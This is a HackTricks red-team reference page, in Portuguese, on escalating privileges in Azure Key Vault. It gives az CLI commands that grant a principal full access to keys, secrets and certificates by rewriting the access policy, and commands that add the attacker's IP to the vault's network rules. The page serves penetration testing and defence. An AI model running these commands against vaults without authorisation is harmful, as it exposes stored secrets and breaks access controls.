Az - Key Vault Privesc

Reading time: 3 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure Key Vault

Para mais informações sobre este serviço, consulte:

Az - Key Vault

Microsoft.KeyVault/vaults/write

Um atacante com esta permissão poderá modificar a política de um cofre de chaves (o cofre de chaves deve estar usando políticas de acesso em vez de RBAC).

bash
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>

# Get current principal ID
az ad signed-in-user show --query id --output tsv

# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all

Modificar Restrições de Rede

Pode ser possível que você tenha permissões suficientes para acessar dados sensíveis (como o valor de um segredo), mas não consegue acessá-los porque o cofre de chaves está restrito a uma rede específica. Se você tiver permissão para modificar as restrições de rede, pode adicionar seu IP à lista de IPs permitidos.

bash
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>

# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks